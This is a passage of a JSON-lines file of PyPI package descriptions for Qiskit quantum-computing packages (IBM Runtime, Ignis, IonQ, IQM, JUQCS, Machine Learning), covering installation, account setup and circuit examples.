through:IBMQ.backends()IBMQ.get_backend('ibmq_qasm_simulator')In version0.3onwards, the preferred way to access the backends is via aProviderfor one of your projects instead of via the globalIBMQinstance\ndirectly, allowing for more granular control over\nthe project you are using:my_provider=IBMQ.get_provider()my_provider.backends()my_provider.get_backend('ibmq_qasm_simulator')In a similar spirit, you can check the providers that you have access to via:IBMQ.providers()In addition, since the new IBM Quantum provides only one set of\ncredentials, the account management methods in IBMQ are now in singular form.\nFor example, you should useIBMQ.load_account()instead ofIBMQ.load_accounts(). AnIBMQAccountErrorexception is raised if you\nattempt to use the legacy methods with an IBM Quantum v2 account.The following tables contains a quick reference for the differences between the\ntwo versions. 
Please refer to the documentation of each method for more in\ndepth details:Account management<0.3 / v1 credentials>=0.3 and v2 credentialsN/AIBMQ.update_account()IBMQ.save_account(token, url)IBMQ.save_account(token)IBMQ.load_accounts()provider = IBMQ.load_account()IBMQ.enable_account()provider = IBMQ.enable_account()IBMQ.disable_accounts()IBMQ.disable_account()IBMQ.active_accounts()IBMQ.active_account()IBMQ.stored_accounts()IBMQ.stored_account()IBMQ.delete_accounts()IBMQ.delete_account()Using backends<0.3 / v1 credentials>=0.3 and v2 credentialsN/Aproviders = IBMQ.providers()backend = IBMQ.get_backend(name, hub='HUB')provider = IBMQ.get_provider(hub='HUB')backend = provider.get_backend(name)backends = IBMQ.backends(hub='HUB')provider = IBMQ.get_provider(hub='HUB')backends = provider.backends()Contribution GuidelinesIf you'd like to contribute to IBM Quantum Provider, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct.\nBy participating, you are expect to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use the\ninvite link atQiskit.org. For questions that are more suited for a forum we\nuse theQiskittag inStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from ourQiskit Tutorialrepository.Authors and CitationThe Qiskit IBM Quantum Provider is the work ofmany peoplewho contribute to the\nproject at different levels. If you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0."} +{"package": "qiskit-ibm-runtime", "pacakge-description": "Qiskit Runtime IBM ClientQiskitis an open-source SDK for working with quantum computers at the level of extended quantum circuits, operators, and primitives.Qiskit IBM Runtimeis a new environment offered by IBM Quantum that streamlines quantum computations and provides optimal\nimplementations of the Qiskit primitivessamplerandestimatorfor IBM Quantum hardware. It is designed to use additional classical compute resources to execute quantum circuits with more efficiency on quantum processors, by including near-time computations such as error suppression and error mitigation. Examples of error suppression include dynamical decoupling, noise-aware compilation, error mitigation including readout mitigation, zero-noise extrapolation (ZNE), and probabilistic error cancellation (PEC).Using the runtime service, a research team at IBM Quantum was able to achieve a 120x speedup\nin their lithium hydride simulation. For more information, see theIBM Research blog.This module provides the interface to access the Qiskit Runtime service on IBM Quantum Platform or IBM Cloud.InstallationYou can install this package using pip:pipinstallqiskit-ibm-runtimeAccount setupQiskit Runtime service on IBM Quantum PlatformYou will need your IBM Quantum API token to authenticate with the runtime service:Create an IBM Quantum account or log in to your existing account by visiting theIBM Quantum login page.Copy (and optionally regenerate) your API token from yourIBM Quantum account page.Qiskit Runtime service on IBM CloudThe runtime service is now part of the IBM Quantum Services on IBM Cloud. 
To use this service, you'll\nneed to create an IBM Cloud account and a quantum service instance.This guidecontains step-by-step instructions, including how to find your\nIBM Cloud API key and Cloud Resource Name (CRN), which you will need for authentication.Save your account on diskOnce you have the account credentials, you can save them on disk, so you won't have to input\nthem each time. The credentials are saved in the$HOME/.qiskit/qiskit-ibm.jsonfile, where$HOMEis your home directory.:warning: Account credentials are saved in plain text, so only do so if you are using a trusted device.fromqiskit_ibm_runtimeimportQiskitRuntimeService# Save an IBM Cloud account.QiskitRuntimeService.save_account(channel=\"ibm_cloud\",token=\"MY_IBM_CLOUD_API_KEY\",instance=\"MY_IBM_CLOUD_CRN\")# Save an IBM Quantum account.QiskitRuntimeService.save_account(channel=\"ibm_quantum\",token=\"MY_IBM_QUANTUM_TOKEN\")Once the account is saved on disk, you can instantiate the service without any arguments:fromqiskit_ibm_runtimeimportQiskitRuntimeServiceservice=QiskitRuntimeService()Loading account from environment variablesAlternatively, the service can discover credentials from environment variables:exportQISKIT_IBM_TOKEN=\"MY_IBM_CLOUD_API_KEY\"exportQISKIT_IBM_INSTANCE=\"MY_IBM_CLOUD_CRN\"exportQISKIT_IBM_CHANNEL=\"ibm_cloud\"Then instantiate the service without any arguments:fromqiskit_ibm_runtimeimportQiskitRuntimeServiceservice=QiskitRuntimeService()Enabling account for current Python sessionAs another alternative, you can also enable an account just for the current session by instantiating the\nservice with your credentials.fromqiskit_ibm_runtimeimportQiskitRuntimeService# For an IBM Cloud account.ibm_cloud_service=QiskitRuntimeService(channel=\"ibm_cloud\",token=\"MY_IBM_CLOUD_API_KEY\",instance=\"MY_IBM_CLOUD_CRN\")# For an IBM Quantum account.ibm_quantum_service=QiskitRuntimeService(channel=\"ibm_quantum\",token=\"MY_IBM_QUANTUM_TOKEN\")PrimitivesAll quantum applications and algorithms level are fundamentally built using three steps:Choose a quantum circuit to encode the quantum state.Define the observable or the classical register to be measured.Execute the quantum circuits by using a primitive (Estimator or Sampler).Primitivesare base-level functions that serve as building blocks for many quantum algorithms and applications. Theprimitive interfacesare defined in Qiskit.The IBM Runtime service offers these primitives with additional features, such as built-in error suppression and mitigation.There are several different options you can specify when calling the primitives. Seeqiskit_ibm_runtime.Optionsclass for more information.SamplerThis primitive takes a list of user circuits (including measurements) as input and generates an error-mitigated readout of quasi-probability distributions. This provides users a way to better evaluate shot results using error mitigation, and enables them to more efficiently evaluate the possibility of multiple relevant data points in the context of destructive interference.To invoke theSamplerprimitivefromqiskit_ibm_runtimeimportQiskitRuntimeService,Options,SamplerfromqiskitimportQuantumCircuitservice=QiskitRuntimeService()options=Options(optimization_level=1)options.execution.shots=1024# Options can be set using auto-complete.# 1. A quantum circuit for preparing the quantum state (|00> + |11>)/rt{2}bell=QuantumCircuit(2)bell.h(0)bell.cx(0,1)# 2. Map the qubits to a classical register in ascending orderbell.measure_all()# 3. 
Execute using the Sampler primitivebackend=service.get_backend('ibmq_qasm_simulator')sampler=Sampler(backend=backend,options=options)job=sampler.run(circuits=bell)print(f\"Job ID is{job.job_id()}\")print(f\"Job result is{job.result()}\")EstimatorThis primitive takes circuits and observables as input, to evaluate expectation values and variances for a given parameter input. This Estimator allows users to efficiently calculate and interpret expectation values of quantum operators required for many algorithms.To invoke theEstimatorprimitive:fromqiskit_ibm_runtimeimportQiskitRuntimeService,Options,Estimatorfromqiskit.quantum_infoimportSparsePauliOpfromqiskitimportQuantumCircuitfromqiskit.circuitimportParameterimportnumpyasnpservice=QiskitRuntimeService()options=Options(optimization_level=1)options.execution.shots=1024# Options can be set using auto-complete.# 1. A quantum circuit for preparing the quantum state (|000> + e^{itheta} |111>)/rt{2}theta=Parameter('\u03b8')qc_example=QuantumCircuit(3)qc_example.h(0)# generate superpositionqc_example.p(theta,0)# add quantum phaseqc_example.cx(0,1)# condition 1st qubit on 0th qubitqc_example.cx(0,2)# condition 2nd qubit on 0th qubit# 2. the observable to be measuredM1=SparsePauliOp.from_list([(\"XXY\",1),(\"XYX\",1),(\"YXX\",1),(\"YYY\",-1)])# batch of theta parameters to be executedpoints=50theta1=[]forxinrange(points):theta=[x*2.0*np.pi/50]theta1.append(theta)# 3. Execute using the Estimator primitivebackend=service.get_backend('ibmq_qasm_simulator')estimator=Estimator(backend,options=options)job=estimator.run(circuits=[qc_example]*points,observables=[M1]*points,parameter_values=theta1)print(f\"Job ID is{job.job_id()}\")print(f\"Job result is{job.result().values}\")This code batches together 50 parameters to be executed in a single job. If a user wanted to find thethetathat optimized the observable, they could plot and observe it occurs attheta=np.pi/2. For speed we recommend batching results together (note that depending on your access, there may be limits on the number of circuits, objects, and parameters that you can send).SessionIn many algorithms and applications, an Estimator needs to be called iteratively without incurring queuing delays on each iteration. To solve this, the IBM Runtime service provides aSession. A session starts when the first job within the session is started, and subsequent jobs within the session are prioritized by the scheduler.You can use theqiskit_ibm_runtime.Sessionclass to start a\nsession. Consider the same example above and try to find the optimaltheta. The following example uses thegolden search methodto iteratively find the optimal theta that maximizes the observable.To invoke theEstimatorprimitive within a session:fromqiskit_ibm_runtimeimportQiskitRuntimeService,Session,Options,Estimatorfromqiskit.quantum_infoimportSparsePauliOpfromqiskitimportQuantumCircuitfromqiskit.circuitimportParameterimportnumpyasnpservice=QiskitRuntimeService()options=Options(optimization_level=1)options.execution.shots=1024# Options can be set using auto-complete.# 1. A quantum circuit for preparing the quantum state (|000> + e^{itheta} |111>)/rt{2}theta=Parameter('\u03b8')qc_example=QuantumCircuit(3)qc_example.h(0)# generate superpostionqc_example.p(theta,0)# add quantum phaseqc_example.cx(0,1)# condition 1st qubit on 0th qubitqc_example.cx(0,2)# condition 2nd qubit on 0th qubit# 2. 
the observable to be measuredM1=SparsePauliOp.from_list([(\"XXY\",1),(\"XYX\",1),(\"YXX\",1),(\"YYY\",-1)])gr=(np.sqrt(5)+1)/2# golden ratiothetaa=0# lower range of thetathetab=2*np.pi# upper range of thetatol=1e-1# tol# 3. Execute iteratively using the Estimator primitivewithSession(service=service,backend=\"ibmq_qasm_simulator\")assession:estimator=Estimator(session=session,options=options)#next test rangethetac=thetab-(thetab-thetaa)/grthetad=thetaa+(thetab-thetaa)/grwhileabs(thetab-thetaa)>tol:print(f\"max value of M1 is in the range theta ={[thetaa,thetab]}\")job=estimator.run(circuits=[qc_example]*2,observables=[M1]*2,parameter_values=[[thetac],[thetad]])test=job.result().valuesiftest[0]>test[1]:thetab=thetadelse:thetaa=thetacthetac=thetab-(thetab-thetaa)/grthetad=thetaa+(thetab-thetaa)/gr# Final job to evaluate Estimator at midpoint found using golden search methodtheta_mid=(thetab+thetaa)/2job=estimator.run(circuits=qc_example,observables=M1,parameter_values=theta_mid)print(f\"Session ID is{session.session_id}\")print(f\"Final Job ID is{job.job_id()}\")print(f\"Job result is{job.result().values}at theta ={theta_mid}\")This code returnsJob result is [4.] at theta = 1.575674623307102using only nine iterations. This is a very powerful extension to the primitives. However, using too much code between iterative calls can lock the QPU and use excessive QPU time, which is expensive. We recommend only using sessions when needed. The Sampler can also be used within a session, but there are not any well-defined examples for this.InstancesAccess to IBM Quantum Platform channel is controlled by the instances (previously called providers) to which you are assigned. An instance is defined by a hierarchical organization of hub, group, and project. A hub is the top level of a given hierarchy (organization) and contains within it one or more groups. These groups are in turn populated with projects. The combination of hub/group/project is called an instance. Users can belong to more than one instance at any time.NOTE:IBM Cloud instances are different from IBM Quantum Platform instances. IBM Cloud does not use the hub/group/project structure for user management. To view and create IBM Cloud instances, visit theIBM Cloud Quantum Instances page.To view a list of your instances, visit youraccount settings pageor use theinstances()method.You can specify an instance when initializing the service or provider, or when picking a backend:# Optional: List all the instances you can access.service=QiskitRuntimeService(channel='ibm_quantum')print(service.instances())# Optional: Specify the instance at service level. 
This becomes the default unless overwritten.service=QiskitRuntimeService(channel='ibm_quantum',instance=\"hub1/group1/project1\")backend1=service.backend(\"ibmq_manila\")# Optional: Specify the instance at the backend level, which overwrites the service-level specification when this backend is used.backend2=service.backend(\"ibmq_manila\",instance=\"hub2/group2/project2\")sampler1=Sampler(backend=backend1)# this will use hub1/group1/project1sampler2=Sampler(backend=backend2)# this will use hub2/group2/project2If you do not specify an instance, then the code will select one in the following order:If your account only has access to one instance, it is selected by default.If your account has access to multiple instances, but only one can access the requested backend, the instance with access is selected.In all other cases, the code selects the first instance other than ibm-q/open/main that has access to the backend.Access your IBM Quantum backendsAbackendis a quantum device or simulator capable of running quantum circuits or pulse schedules.You can query for the backends you have access to. Attributes and methods of the returned instances\nprovide information, such as qubit counts, error rates, and statuses, of the backends.fromqiskit_ibm_runtimeimportQiskitRuntimeServiceservice=QiskitRuntimeService()# Display all backends you have access.print(service.backends())# Get a specific backend.backend=service.backend('ibmq_qasm_simulator')# Print backend coupling map.print(backend.coupling_map)Next StepsNow you're set up and ready to check out some of thetutorials.Contribution guidelinesIf you'd like to contribute to qiskit-ibm-runtime, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use the\ninvite link atibm.com/quantum/qiskit. For questions that are more suited for a forum we\nuse theQiskittag inStack Exchange.LicenseApache License 2.0."} +{"package": "qiskit-ignis", "pacakge-description": "Qiskit Ignis (DEPRECATED)NOTEAs of the version 0.7.0 Qiskit Ignis is deprecated and has been\nsuperseded by theQiskit Experimentsproject.\nActive development on the project has stopped and only compatibility fixes\nand other critical bugfixes will be accepted until the project is officially\nretired and archived.Qiskitis an open-source framework for working with noisy quantum computers at the level of pulses, circuits, and algorithms.Qiskit is made up of elements that each work together to enable quantum computing. 
This element is Ignis, which provides tools for quantum hardware verification, noise characterization, and error correction. Migration Guide: As of version 0.7.0, Qiskit Ignis has been deprecated and some of its functionality was migrated into the qiskit-experiments package and into qiskit-terra. Ignis characterization module: This module was partly migrated to qiskit-experiments and split into two different modules: qiskit_experiments.library.calibration and qiskit_experiments.library.characterization. AmpCal is now replaced by FineAmplitude. ZZFitter was not migrated yet. Ignis discriminator module: This module is in the process of migration to qiskit-experiments. Ignis mitigation module: The readout mitigator will soon be added to qiskit-terra. Experiments for generating the readout mitigators will be added to qiskit-experiments. For use of mitigators with qiskit.algorithms and the QuantumInstance class, this has been integrated into qiskit-terra directly with the QuantumInstance. Ignis verification module: Randomized benchmarking, Quantum Volume, and State and Process Tomography were migrated to qiskit-experiments. Migration of gate-set tomography to qiskit-experiments is in progress. topological_codes will continue development under NCCR-SPIN, while the functionality is reintegrated into Qiskit. Some additional functionality can also be found in the offshoot project qtcodes. Currently the Accreditation and Entanglement modules have not been migrated. The following table gives a more detailed breakdown that relates the functionality, as it existed in Ignis, to where it now lives after this move (Old -> New, Library):
qiskit.ignis.characterization.calibrations -> qiskit_experiments.library.calibration (qiskit-experiments)
qiskit.ignis.characterization.coherence -> qiskit_experiments.library.characterization (qiskit-experiments)
qiskit.ignis.mitigation -> qiskit_terra.mitigation (qiskit-terra)
qiskit.ignis.verification.quantum_volume -> qiskit_experiments.library.quantum_volume (qiskit-experiments)
qiskit.ignis.verification.randomized_benchmarking -> qiskit_experiments.library.randomized_benchmarking (qiskit-experiments)
qiskit.ignis.verification.tomography -> qiskit_experiments.library.tomography (qiskit-experiments)
Installation: We encourage installing Qiskit via the pip tool (a python package manager). The following command installs the core Qiskit components, including Ignis.
pip install qiskit
Pip will handle all dependencies automatically for us and you will always install the latest (and well-tested) version. To install from source, follow the instructions in the contribution guidelines. Extra Requirements: Some functionality has extra optional requirements. If you're going to use any visualization functions for fitters you'll need to install matplotlib. You can do this with pip install matplotlib or when you install ignis with pip install qiskit-ignis[visualization]. If you're going to use a cvx fitter for running tomography you'll need to install cvxpy. You can do this with pip install cvxpy or when you install ignis with pip install qiskit-ignis[cvx]. When performing expectation value measurement error mitigation using the CTMP method, performance can be improved using just-in-time compiling if Numba is installed. You can do this with pip install numba or when you install ignis with pip install qiskit-ignis[jit]. For using the discriminator classes in qiskit.ignis.measurement, scikit-learn needs to be installed. You can do this with pip install scikit-learn or when you install ignis with pip install qiskit-ignis[iq].
If you want to install all extra requirements\nwhen you install ignis you can runpip install qiskit-ignis[visualization,cvx,jit,iq].Creating your first quantum experiment with Qiskit IgnisNow that you have Qiskit Ignis installed, you can start creating experiments, to reveal information about the device quality. Here is a basic example:$ python# Import Qiskit classesimportqiskitfromqiskitimportQuantumRegister,QuantumCircuit,ClassicalRegisterfromqiskit.providers.aerimportnoise# import AER noise model# Measurement error mitigation functionsfromqiskit.ignis.mitigation.measurementimport(complete_meas_cal,CompleteMeasFitter,MeasurementFilter)# Generate a noise model for the qubitsnoise_model=noise.NoiseModel()forqiinrange(5):read_err=noise.errors.readout_error.ReadoutError([[0.75,0.25],[0.1,0.9]])noise_model.add_readout_error(read_err,[qi])# Generate the measurement calibration circuits# for running measurement error mitigationqr=QuantumRegister(5)meas_cals,state_labels=complete_meas_cal(qubit_list=[2,3,4],qr=qr)# Execute the calibration circuitsbackend=qiskit.Aer.get_backend('qasm_simulator')job=qiskit.execute(meas_cals,backend=backend,shots=1000,noise_model=noise_model)cal_results=job.result()# Make a calibration matrixmeas_fitter=CompleteMeasFitter(cal_results,state_labels)# Make a 3Q GHZ statecr=ClassicalRegister(3)ghz=QuantumCircuit(qr,cr)ghz.h(qr[2])ghz.cx(qr[2],qr[3])ghz.cx(qr[3],qr[4])ghz.measure(qr[2],cr[0])ghz.measure(qr[3],cr[1])ghz.measure(qr[4],cr[2])# Execute the GHZ circuit (with the same noise model)job=qiskit.execute(ghz,backend=backend,shots=1000,noise_model=noise_model)results=job.result()# Results without mitigationraw_counts=results.get_counts()print(\"Results without mitigation:\",raw_counts)# Create a measurement filter from the calibration matrixmeas_filter=meas_fitter.filter# Apply the filter to the raw counts to mitigate# the measurement errorsmitigated_counts=meas_filter.apply(raw_counts)print(\"Results with mitigation:\",{l:int(mitigated_counts[l])forlinmitigated_counts})Results without mitigation: {'000': 181, '001': 83, '010': 59, '011': 65, '100': 101, '101': 48, '110': 72, '111': 391}\n\nResults with mitigation: {'000': 421, '001': 2, '011': 1, '100': 53, '110': 13, '111': 510}Contribution GuidelinesIf you'd like to contribute to Qiskit Ignis, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expect to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use thelink. For questions that are more suited for a forum we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from ourQiskit Tutorialsrepository.Authors and CitationQiskit Ignis is the work ofmany peoplewho contribute\nto the project at different levels. If you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-ignis-rb", "pacakge-description": "qiskit-ignis-rbThis is a temporary fork of the originalqiskit-ignislibrary with just the RB specific modules. 
We plan to deprecate this and move toqiskit-experimentsonce we figure out the differences between the RB implementation in the two libraries.Please check the originalqiskit-ignislibrary for model details and documentation."} +{"package": "qiskit-ionq", "pacakge-description": "Qiskit IonQ ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows access toIonQion trap quantum\nsystems.The example python notebook (in/example) should help you understand basic usage.API AccessThe IonQ Provider uses IonQ's REST API, and using the provider requires an API access token from IonQ. If you would like to use IonQ as a Qiskit provider, please visithttps://cloud.ionq.com/settings/keysto generate an IonQ API key.Installation:information_source:The Qiskit IonQ Provider requiresqiskit-terra>=0.17.4!To ensure you are on the latest version, run:pipinstall-U\"qiskit-terra>=0.17.4\"You can install the provider using pip:pipinstallqiskit-ionqProvider SetupTo instantiate the provider, make sure you have an access token then create a provider:fromqiskit_ionqimportIonQProviderprovider=IonQProvider(\"token\")Credential Environment VariablesAlternatively, the IonQ Provider can discover your access token from environment variables:exportIONQ_API_TOKEN=\"token\"Then invoke instantiate the provider without any arguments:fromqiskit_ionqimportIonQProvider,ErrorMitigationprovider=IonQProvider()Once the provider has been instantiated, it may be used to access supported backends:# Show all current supported backends:print(provider.backends())# Get IonQ's simulator backend:simulator_backend=provider.get_backend(\"ionq_simulator\")Submitting a CircuitOnce a backend has been specified, it may be used to submit circuits.\nFor example, running a Bell State:fromqiskitimportQuantumCircuit# Create a basic Bell State circuit:qc=QuantumCircuit(2,2)qc.h(0)qc.cx(0,1)qc.measure([0,1],[0,1])# Run the circuit on IonQ's platform with error mitigation:job=simulator_backend.run(qc,error_mitigation=ErrorMitigation.DEBIASING)# Print the results.print(job.result().get_counts())# Get results with a different aggregation method when debiasing# is applied as an error mitigation strategyprint(job.result(sharpen=True).get_counts())# The simulator specifically provides the the ideal probabilities and creates# counts by sampling from these probabilities. The raw probabilities are also accessible:print(job.result().get_probabilities())Basis gates and transpilationThe IonQ provider provides access to the full IonQ Cloud backend, which includes its own transpilation and compilation pipeline. As such, IonQ provider backends have a broad set of \"basis gates\" that they will accept \u2014\u00a0effectively anything the IonQ API will accept. They areccx, ch, cnot, cp, crx, cry, crz, csx, cx, cy, cz, h, i, id, mcp, mct, mcx, measure, p, rx, rxx, ry, ryy, rz, s, sdg, swap, sx, sxdg, t, tdg, toffoli, x, yandz.If you have circuits that you'd like to run on IonQ backends that use other gates than this (uoriswapfor example), you will either need to manually rewrite the circuit to only use the above list, or use the Qiskit transpiler, per the example below. 
Please note that not all circuits can be automatically transpiled.If you'd like lower-level access\u2014the ability to program in native gates and skip our compilation/transpilation pipeline\u2014please reach out to your IonQ contact for further information.fromqiskitimportQuantumCircuit,transpilefrommathimportpiqc2=QuantumCircuit(1,1)qc2.u(pi,pi/2,pi/4,0)qc2.measure(0,0)transpiled_circuit=transpile(qc2,simulator_backend)ContributingIf you'd like to contribute to the IonQ Provider, please take a look at thecontribution guidelines. This project adheres the Qiskit Community code of conduct. By participating, you are agreeing to uphold this code.If you have an enhancement request or bug report, we encourage you to open an issue inthis repo's issues tracker. If you have a support question or general discussion topic, we recommend instead asking on theQiskit community slack(you can join usingthis link) or theQuantum Computing StackExchange.Running TestsThis package uses thepytesttest runner, and other packages\nfor mocking interfactions, reporting coverage, etc.\nThese can be installed withpip install -r requirements-test.txt.To use pytest directly, just run:pytest[pytest-args]Alternatively, you may use the setuptools integration by running tests throughsetup.py, e.g.:pythonsetup.pytest--addopts=\"[pytest-args]\"FixturesGlobal pytest fixtures for the test suite can be found in the top-leveltest/conftest.pyfile.SSL certificate issuesIf you receive the errorSSLError(SSLCertVerificationError)or otherwise are unable to connect succesfully, there are a few possible resolutions:Try accessinghttps://api.ionq.co/v0.3/healthin your browser; if this does not load, you need to contact an IT administrator about allowing IonQ API access.pip install pip_system_certsinstructs python to use the same certificate roots of trust as your local browser - install this if the first step succeeded but qiskit-ionq continues to have issues.You can debug further by runningres = requests.get('https://api.ionq.co/v0.3/health', timeout=30)and inspectingres, you should receive a 200 response with the content{\"status\": \"pass\"}. If you see a corporate or ISP login page, you will need to contact a local IT administrator to debug further.DocumentationTo build the API reference and quickstart docs, run:pipinstall-rrequirements-docs.txt\nmakehtml\nopenbuild/html/index.htmlLicenseApache License 2.0.The IonQ logo and Q mark are copyright IonQ, Inc. All rights reserved."} +{"package": "qiskit-iqm", "pacakge-description": "Qiskit on IQMQiskitadapter forIQM\u2019squantum computers.What is it good for?With Qiskit on IQM, you can for example:Transpile arbitrary quantum circuits for IQM quantum architecturesSimulate execution with an IQM-specific noise modelExecute quantum circuits on an IQM quantum computerInstallationThe recommended way is to install the distribution packageqiskit-iqmdirectly from the\nPython Package Index (PyPI):$pipinstallqiskit-iqmDocumentationThe documentation of the latest Qiskit on IQM release is availablehere.Jump to ourUser guidefor a quick introduction on how to use Qiskit on IQM.CopyrightQiskit on IQM is free software, released under the Apache License, version 2.0.Copyright 2022-2024 Qiskit on IQM developers."} +{"package": "qiskit-iqm-unstable", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiskit-jku-provider", "pacakge-description": "This module contains [Qiskit](https://www.qiskit.org/) simulator whose backend is written in JKU\u2019s simulator. 
This simulator simulates a quantum circuit on a classical computer."} +{"package": "qiskit-juqcs", "pacakge-description": "qiskit-juqcs: Qiskit provider for JUQCS (Juelich Universal Quantum Computer Simulator). This package allows a user with valid Judoor credentials to use JUQCS (Juelich Universal Quantum Computer Simulator) for simulating quantum circuits of up to 40 qubits on HPC systems of the Juelich Supercomputing Center. Currently two modes of operation are supported by the JUQCS simulator: Sampling mode (qasm_simulator): up to 100,000 shots and up to 40 qubits. Statevector mode (statevector_simulator): up to 20 qubits. Installation:
pip install git+https://jugit.fz-juelich.de/qip/juniq-platform/qiskit-juqcs.git
or
pip install git+ssh://git@jugit.fz-juelich.de/qip/juniq-platform/qiskit-juqcs.git
First steps: If you are using this package from JUNIQ-Cloud, this step will be taken care of automatically and you may skip to the next section. If you are manually installing this package on your local machine, you will be prompted to provide your Judoor username and password when first importing the module. These credentials will be stored on your machine so authentication against JUNIQ-service will happen automatically the next time. Every time it is imported, the package checks with JUNIQ-service whether the credentials are valid. In case you provided the wrong credentials, or you have updated them since the last time you used the package, you will be prompted to provide them again. NOTE: The credentials will not be updated until you import the module again in a new Python session. Usage example: This section shows how to submit a circuit for simulation to JUQCS. Import Qiskit and create the circuit which we want to simulate:
import qiskit
circuit = qiskit.QuantumCircuit(5)
circuit.h(0)
circuit.cx(0, 1)
circuit.cx(0, 2)
circuit.measure_all()
Import the Juqcs provider and choose a backend from 'statevector_simulator' or 'qasm_simulator':
from juqcs import Juqcs
backend = Juqcs.get_backend('qasm_simulator')
NOTE: Since each simulator returns a different type of output, different limitations for the maximum qubit size apply (20 qubits for 'statevector_simulator' and 40 qubits for 'qasm_simulator'). So far the process has not deviated from the usage of a typical Qiskit backend, but the following step is unique to the JUQCS backends:
backend.allocate(minutes=30, max_qubits=5, reservation=None)
NOTE: This function may take a few minutes to return, depending largely on the load of the HPC system at the time of submission. Since the JUQCS simulator is deployed on an HPC system whose compute resources are shared with many other users, we now need to ask the HPC system for permission to simulate our circuits. In this step we are making two \"promises\" to the HPC system, and the success of our simulation experiment depends on us keeping these promises: We promise that the biggest circuit that we want to simulate under this allocation will have at most int(max_qubits) qubits. If we try to submit a bigger circuit, the HPC system would not have allocated sufficient compute resources for us, so the simulation would fail. We only need to include this parameter if we want to simulate circuits larger than 32 qubits, since any circuit up to and including this size requires exactly the same amount of compute resources. We promise that we will be done with our simulation experiments within int(minutes) minutes. By default, this parameter is set to 60 minutes, and the longest running allocation we can create is 24 hours (=1440 minutes).
After this time is exceeded our allocation will expire, so circuit simulation submissions beyond this point would fail. In order to fix this we would need to create a new allocation.NOTEOptionally we can passstr(reservation)to our allocation request if we have been given an HPC reservation ID (e.g. when attending a training course at JSC). If you do not have a reservation ID do not worry, JUQCS will work without one too.We can make sure that the allocation has been successfully created for us by callingbackend.status().status_msg. If a valid allocation is available, we will see a message like'Resource allocation #{allocation ID} of {number} qubits available until {expiration time}.'.Now we can use our JUQCS backend just as any other typical Qiskit backend, e.g.:job=qiskit.execute(circuit,backend=backend,shots=1000,seed=10)result=job.result()print(result.get_counts())Whenjob.result()is called withpartial=Trueas argument, this method will attempt to retrieve partial results of failed jobs. In this case, precaution should be taken when accessing individual experiments, as doing so might cause an exception. Thesuccessattribute of the returned Result instance can be used to verify whether it contains partial results.Once we are finished with our experiments it is good practice to callbackend.deallocate().In case our allocation is still running this will revoke the allocation, so that we only get charged for the time our allocation was running, instead of for the time we promised the HPC system we would need the allocation for. If the allocation is not running anymore this function will not have any effect, so it's better to call it anyway to be on the safe side!Release History0.4.0Client-side changes to execute JUQCS on JURECA-dc.0.3.0Now using juniq-service:juqcs-service script bundle.Authentication mechanism reworked.Improved error handling and reporting.Several bugs fixed.0.2.0First public release.MetaCarlos Gonzalez Calaza -c.gonzalez.calaza@fz-juelich.deDistributed under the MIT license. SeeLICENSEfor more information.https://gitlab.com/juniq-platform/qiskit-juqcs"} +{"package": "qiskit-machine-learning", "pacakge-description": "Qiskit Machine LearningQiskit Machine Learning introduces fundamental computational building blocks - such as Quantum Kernels\nand Quantum Neural Networks - used in different applications, including classification and regression.\nOn the one hand, this design is very easy to use and allows users to rapidly prototype a first model\nwithout deep quantum computing knowledge. On the other hand, Qiskit Machine Learning is very flexible,\nand users can easily extend it to support cutting-edge quantum machine learning research.Qiskit Machine Learning provides theFidelityQuantumKernelclass that makes use of theFidelityalgorithm introduced in Qiskit and can be easily used to directly compute\nkernel matrices for given datasets or can be passed to a Quantum Support Vector ClassifierQSVCor\nQuantum Support Vector RegressorQSVRto quickly start solving classification or regression problems.\nIt also can be used with many other existing kernel-based machine learning algorithms from established\nclassical frameworks.Qiskit Machine Learning defines a generic interface for neural networks that is implemented by different\nquantum neural networks. 
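As a minimal sketch of the kernel workflow described above (before returning to the neural-network interface), the snippet below builds a FidelityQuantumKernel from a ZZFeatureMap and passes it to QSVC; the tiny dataset is made up purely for illustration.
import numpy as np
from qiskit.circuit.library import ZZFeatureMap
from qiskit_machine_learning.kernels import FidelityQuantumKernel
from qiskit_machine_learning.algorithms import QSVC

# Made-up toy data: two features per sample, binary labels.
train_features = np.array([[0.1, 0.2], [0.4, 0.3], [0.8, 0.9], [0.7, 0.6]])
train_labels = np.array([0, 0, 1, 1])

# Quantum kernel built from a standard feature map, then used by a classical SVC.
feature_map = ZZFeatureMap(feature_dimension=2, reps=2)
kernel = FidelityQuantumKernel(feature_map=feature_map)

qsvc = QSVC(quantum_kernel=kernel)
qsvc.fit(train_features, train_labels)
print(qsvc.score(train_features, train_labels))
The same kernel object can also be plugged into other kernel-based learners, as noted above; the neural-network interface and its core implementations are described next.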
Two core implementations are readily provided, such as theEstimatorQNN,\nand theSamplerQNN.\nTheEstimatorQNNleverages theEstimatorprimitive from Qiskit and\nallows users to combine parametrized quantum circuits with quantum mechanical observables. The circuits can be constructed using, for example, building blocks\nfrom Qiskit\u2019s circuit library, and the QNN\u2019s output is given by the expected value of the observable.\nTheSamplerQNNleverages another primitive introduced in Qiskit, theSamplerprimitive.\nThis neural network translates quasi-probabilities of bitstrings estimated by the primitive into a desired output. This\ntranslation step can be used to interpret a given bitstring in a particular context, e.g. translating it into a set of classes.The neural networks include the functionality to evaluate them for a given input as well as to compute the\ncorresponding gradients, which is important for efficient training. To train and use neural networks,\nQiskit Machine Learning provides a variety of learning algorithms such as theNeuralNetworkClassifierandNeuralNetworkRegressor.\nBoth take a QNN as input and then use it in a classification or regression context.\nTo allow an easy start, two convenience implementations are provided - the Variational Quantum ClassifierVQCas well as the Variational Quantum RegressorVQR.\nBoth take just a feature map and an ansatz and construct the 